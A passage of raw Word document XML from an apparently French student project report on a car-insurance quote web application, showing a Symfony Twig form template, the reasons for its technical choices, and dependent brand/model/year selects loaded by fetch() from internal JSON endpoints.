      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>': { 'class': 'd-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>flex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>flex-column</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">' } }) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C09CCF" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="001F6DEE" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r w:rsidRPr="001F6DEE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084C87D2"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&lt;h3</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"my-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Section assurance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0335DD"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"bg-gray3 p-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4536506D"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form.formula</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4FB84A3A"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form.duration</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6C046ABC"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F9C12" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00CE5980" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A931610"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&lt;h3</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"my-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>demandeur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C22E25"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"bg-gray3 p-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F710793"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form.licenseYear</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1E3C6CD8"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form.birthDate</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0F28572A"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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A49EAE" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00CE5980" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B684A6F"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&lt;h3</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"my-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Section Voiture</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC5A44"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"bg-gray3 p-3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1FC9A7"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form.vehicle.brand</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3487FB89"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form.vehicle.model</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5FC997E0" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00CE5980" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_row</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form.vehicle.vehicleYear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D455CC" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00CE5980" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="800000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC62C1" w14:textId="77777777" w:rsidR="001F6DEE" w:rsidRPr="00CE5980" w:rsidRDefault="001F6DEE" w:rsidP="001F6DEE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="098658"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(form) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556331BD" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003A6B7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5977FF7E" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003239D4" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Justification des choix techniques :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EFAD96" w14:textId="54A450E0" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>formulaire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> est </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rendu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> via le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>composant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Form de Symfony (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form_row</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>form_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00555B5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:t>Cette approche génère automatiquement le jeton CSRF dans un champ caché, applique les contraintes de validation définies sur l'entité et construit les attributs HTML5 correspondants. Le formulaire est découpé en trois sections (assurance, demandeur, voiture) séparées par des titres h3 pour une meilleure lisibilité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE342E8" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc233817759"/>
      <w:r w:rsidRPr="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.4 Développement de la partie dynamique des interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="724FE611" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="00540A83" w:rsidRDefault="003239D4" w:rsidP="00EC1B7B">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc233817760"/>
      <w:r w:rsidRPr="00540A83">
        <w:rPr>
          <w:color w:val="004E9A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.4.1 Traitement dynamique n°1 – Chargement dynamique des sélects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="7E3A0A7D" w14:textId="7D68E55A" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00D5693B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le formulaire de devis comporte trois sélects dépendants : marque → modèle → année. Lorsque l'utilisateur sélectionne une marque, une requête </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() est envoyée à </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l'endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> JSON interne /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/brand/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brandName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}. La réponse peuple le sélect des</w:t>
      </w:r>
      <w:r w:rsidR="00D5693B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> modèles, puis la sélection d'un modèle déclenche une deuxième requête vers /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/model/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modelName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} pour charger les années disponibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC3706" w14:textId="23AC3690" w:rsidR="001F6DEE" w:rsidRDefault="00897535">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20B5F1EE" wp14:editId="66FDC2B7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3732835</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>146420</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1318895" cy="1266825"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="538335079" name="Parenthèses 25"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1318895" cy="1266825"/>
                        </a:xfrm>
                        <a:prstGeom prst="bracketPair">
                          <a:avLst>
                            <a:gd name="adj" fmla="val 18951"/>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20DB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5" o:spid="_x0000_s1026" type="#_x0000_t185" style="position:absolute;margin-left:293.9pt;margin-top:11.55pt;width:103.85pt;height:99.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" adj="4093" stroked="f" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B15C37" w14:textId="5072792E" w:rsidR="003A6B7F" w:rsidRDefault="00342B9B">
      <w:r>
        <w:t>Capture</w:t>
      </w:r>
      <w:r w:rsidR="00177086">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d'écran du formulaire avec select </w:t>
      </w:r>
      <w:r w:rsidR="00177086">
        <w:t xml:space="preserve">Marque/Model </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dynamique : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0C84B8" w14:textId="77777777" w:rsidR="00177086" w:rsidRDefault="00177086"/>
    <w:p w14:paraId="3A2A2F07" w14:textId="6E20D03E" w:rsidR="00342B9B" w:rsidRDefault="000840A8" w:rsidP="00D73F47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5152D443" wp14:editId="242583D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3208727</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1445895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="167833" cy="798597"/>
                <wp:effectExtent l="0" t="0" r="22860" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="2058098743" name="Accolade ouvrante 28"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="167833" cy="798597"/>
                        </a:xfrm>
                        <a:prstGeom prst="leftBrace">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 34730"/>
                            <a:gd name="adj2" fmla="val 50000"/>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39F2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28" o:spid="_x0000_s1026" type="#_x0000_t87" style="position:absolute;margin-left:252.65pt;margin-top:113.85pt;width:13.2pt;height:62.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" adj="1577" strokecolor="#e00" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00897535">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E6B2340" wp14:editId="1F1685D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1701478</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>965215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="671332" cy="804441"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="216097243" name="Parenthèses 26"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="671332" cy="804441"/>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60F09" id="Parenthèses 26" o:spid="_x0000_s1026" type="#_x0000_t185" style="position:absolute;margin-left:133.95pt;margin-top:76pt;width:52.85pt;height:6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" stroked="f" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00897535">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E0686DB" wp14:editId="3C054206">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>526648</wp:posOffset>
                </wp:positionH>
